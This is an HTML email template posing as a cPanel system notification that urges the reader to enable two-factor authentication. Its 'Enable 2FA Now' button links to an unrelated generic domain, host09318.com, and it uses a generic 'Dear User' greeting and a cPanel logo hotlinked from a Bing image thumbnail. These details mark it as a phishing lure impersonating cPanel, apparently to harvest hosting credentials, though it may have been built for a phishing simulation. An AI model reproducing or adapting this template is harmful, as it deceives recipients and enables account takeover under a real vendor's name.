<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Action Required: Enable Two-Factor Authentication</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f9f9f9;
    }
    .email-container {
      width: 100%;
      max-width: 600px;
      margin: 20px auto;
      background-color: #ffffff;
      border-radius: 8px;
      border: 1px solid #e0e0e0;
      overflow: hidden;
    }
    .header {
      background-color: #ff6c2c;
      padding: 20px;
      text-align: center;
    }
    .header img {
      width: 150px;
      margin-bottom: 10px;
    }
    .header h1 {
      color: #fff;
      font-size: 20px;
      margin: 0;
    }
    .content {
      padding: 20px;
      color: #333;
    }
    .content p {
      font-size: 14px;
      color: #555;
      line-height: 1.6;
    }
    .steps {
      background-color: #f9f9f9;
      padding: 15px;
      border-left: 4px solid #ff6c2c;
      margin: 20px 0;
    }
    .cta-container {
      text-align: center;
      padding: 20px;
    }
    .cta-button {
      display: inline-block;
      padding: 12px 20px;
      background-color: #ff6c2c;
      color: #ffffff;
      text-decoration: none;
      border-radius: 5px;
      font-size: 14px;
      margin-top: 20px;
    }
    .footer {
      background-color: #f4f4f4;
      text-align: center;
      padding: 15px;
      font-size: 12px;
      color: #888;
      border-top: 1px solid #ddd;
    }
    .footer p {
      margin: 5px 0;
    }
  </style>
</head>
<body style="font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background-color: #f9f9f9">
  <div style="width: 100%;
      max-width: 600px;
      margin: 20px auto;
      background-color: #ffffff;
      border-radius: 8px;
      border: 1px solid #e0e0e0;
      overflow: hidden" class="email-container">
    <div style="background-color: #ff6c2c;
      padding: 20px;
      text-align: center" class="header">
       <h1 style="color: #fff;
      font-size: 20px;
      margin: 0">System Notification: Enable Two-Factor Authentication</h1>
    </div>
    
    <!-- Email Content -->
    <div style="padding: 20px;
      color: #333" class="content">
      <p style="font-size: 14px;
      color: #555;
      line-height: 1.6">Dear User,</p>
      <p style="font-size: 14px;
      color: #555;
      line-height: 1.6">We have detected that Two-Factor Authentication (2FA) is not currently enabled on your account. For your security, we strongly recommend enabling 2FA. This additional layer of protection helps safeguard your account from unauthorized access.</p>

      <div class="steps">
        <p><strong>To enable 2FA, follow these steps:</strong></p>
        <p>1. Click the button below.</p>
        <p>2. Follow the on-screen instructions to configure 2FA using your preferred authentication method.</p>
        <p>3. Confirm your setup to activate 2FA.</p>
      </div>
    </div>

    <!-- CTA Button -->
    <div style="text-align: center;
      padding: 20px" class="cta-container">
      <a style="display: inline-block;
      padding: 12px 20px;
      background-color: #ff6c2c;
      color: #ffffff;
      text-decoration: none;
      border-radius: 5px;
      font-size: 14px;
      margin-top: 20px" class="cta-button" href="https://host09318.com">Enable 2FA Now</a>
    </div>

    <!-- Footer Section -->
    <div style="background-color: #f4f4f4;
      text-align: center;
      padding: 15px;
      font-size: 12px;
      color: #888;
      border-top: 1px solid #ddd" class="footer">
      <p style="margin: 5px 0">This is a system-generated notification from cPanel. Please do not reply to this message.</p>
      <p style="margin: 5px 0">For assistance, contact your administrator or visit our support page.</p>
                <p style="margin: 5px 0">
                        <img alt="cP" src="https://th.bing.com/th/id/OIP.6rqeQTGbZuKw5VNDsK0WtQAAAA?pid=ImgDet&w=191&h=126&c=7" width="31" height="25" style="box-sizing: border-box; vertical-align: middle; line-height: 13px; border: 0px initial initial"></p>
      <p style="margin: 5px 0">© 2025 cPanel, L.L.C. All rights reserved.</p>
    </div>
  </div>
</body>
</html>